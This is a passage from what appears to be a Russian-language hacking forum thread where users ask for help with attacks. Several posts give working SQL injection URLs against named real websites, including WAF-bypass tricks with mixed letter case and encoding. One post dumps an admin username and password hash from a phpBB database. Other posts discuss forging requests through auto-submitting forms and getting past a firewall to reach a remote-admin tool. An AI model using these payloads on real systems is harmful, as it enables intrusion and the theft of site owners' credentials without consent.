Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Поставь снифер приблуду которая отслеживает http-заголовки при нажатии на кнопку "Начать поиск" или "Поиск" или как она там называется. Да, очень часть в целях безопасности визуально стали скрывать передающиеся параметры, но это не значит, что их там нет. Есть для FF такая штука, называется LiveHTTPHeaders, иногда очень полезная бывает
     
  2. atix

    atix New Member

    Joined:
    11 Mar 2008
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Ребят такой вопрос.Можно ли как то открыть порт радмина на другом компе?
    Радмин там запущен,а фаер не пускает.Адрес даже не пингуется.Все действие происходит в локальной сети.
    Стоял касперский на том компе и нод - один фиг.В касперском выставлял разрещение на Remote desctop а толку ноль.
    Может есть какие штуки которые вырубят бдительность фаера?
     
  3. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Передаються методом POST данные значит. Напрямую не получиться заюзать. Сможешь сделать на своем сайте html форму там параметр action формы будет уязвимый скрипт. И прицепить автоотправку формы - если на уязвимом сайте не проверяется реферрер - то круто...
     
  4. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    +union+select+1,2,version(),4,5,6,7+--+

    5.0.77-community-log-
    ???????????????????????????
    что делать если запрос

    +union+select+1,2,table_name,4,5,6,7+from+information_schema.tables+--+

    не проходит, просто пишет

    Code:
    Not Acceptable
    
    An appropriate representation of the requested resource /text_press_year.php could not be found on this server.
    
    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
    +union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+--+

    проходит , но не одну колонку не выдает
     
    _________________________
  5. cupper

    cupper Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    369
    Likes Received:
    92
    Reputations:
    5
    а польщователю что тогда подсовывать ? ссылку на "свой сайт", а от тудова уже будет делать редирект обратно на тот с которого он сцылку заюзал.
    я правильно понял ?
     
  6. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    mod_security, если SecFilterScanPOST Off попробуй постом передать(если скрипт подерживает конечно).
     
  7. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Вместо information_schema.tables, напиши information_schema.Tables
     
    #7187 R1dex, 20 May 2009
    Last edited: 20 May 2009
  8. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    ага, тока не редирект, а засубмичевание формы
     
  9. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    mod_security абсалютно пофигу на регистр символов, хоть так напиши TaBlE_nAmE хоть так tAbLe_nAmE, а вот так может пройти %54able_name
     
  10. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    PaCo, сразу видно, что инъекций ты мало крутил ^^
    Спорим, прокатит?
     
  11. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    http://www.opennet.ru/base/sec/mod_security2.txt.html, я тебе не про сам скрипт говорю, а про модуль апача.
     
  12. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    2 PaCo

    Не прокатывает:
    http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,table_name,4,5,6,7+from+information_schema.tables--+

    Прокатывает:
    http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,TaBle_naMe,4,5,6,7+from+inForMatiOn_sCheMa.taBLes--+

    Кстати возможно я угадал с сайтом ^^
     
  13. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Да, с сайтом угадал.. Прокатывает и просто:

    http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,table_name,4,5,6,7+from+information_schema.Tables--+

    :)
     
  14. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    да я кокраз его крутил тоже(он один и вылазиет с гугл text_press_year.php), значит так настроен mod_security
     
    1 person likes this.
  15. cupper

    cupper Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    369
    Likes Received:
    92
    Reputations:
    5
    еще по XSS.
    1) есть наиболее удачные сканеры XSS, только чтонибуть актуальное а не 3 летней выдержки.
    2) такие сканеры могут сканить только поссивные XSS ?? Есть ли сканеры активных XSS, если есть то как они работают ?
     
  16. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19

    руками хсс искать удобней. имхо
     
  17. pelligrim

    pelligrim Elder - Старейшина

    Joined:
    26 Apr 2008
    Messages:
    31
    Likes Received:
    20
    Reputations:
    0
    Народ, помогите насчет скули! И было бы не плохо если бы еще и объяснили почему так...

    HTML:
    http://193.109.129.190/index.php?page=text&menu=5&sub=-54+union+select+1,2,3,4,5,6,7+from+bertie.phpbb_users--
    Скуля 5
    колонки : phpbb_usersbertieusername, phpbb_usersbertieuser_password - существуют, а ничего не выводится :(

    Пробывал связки cast(****+as+binary), convert(****+using+latin1), unhex(hex(*****))
    и ничего, все то же самое...
     
  18. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://193.109.129.190/index.php?page=text&menu=5&sub=-54+union+select+1,column_name,3,4,5,6,7+from+information_schema.columns+where+table_name=0x70687062625F7573657273--

    http://193.109.129.190/index.php?page=text&menu=5&sub=-54+union+select+1,concat_ws(0x3a,username,user_password),3,4,5,6,7+from+bertie.phpbb_users--

    думаю требуется это:
    admin:$H$9LZ00OBCgmEv2A6/.0VbvqUiJUeNE60
     
  19. pelligrim

    pelligrim Elder - Старейшина

    Joined:
    26 Apr 2008
    Messages:
    31
    Likes Received:
    20
    Reputations:
    0

    тьху, спс, протупил... просто забыл поставить разделитель 0x3a к примеру, а то все слилось у меня и shema и table и column :)
     
  20. AET

    AET New Member

    Joined:
    17 Mar 2008
    Messages:
    23
    Likes Received:
    1
    Reputations:
    -2
    подскажите теперь как тут можно узнать имя и пасс админа или пользователя
     
Thread Status:
Not open for further replies.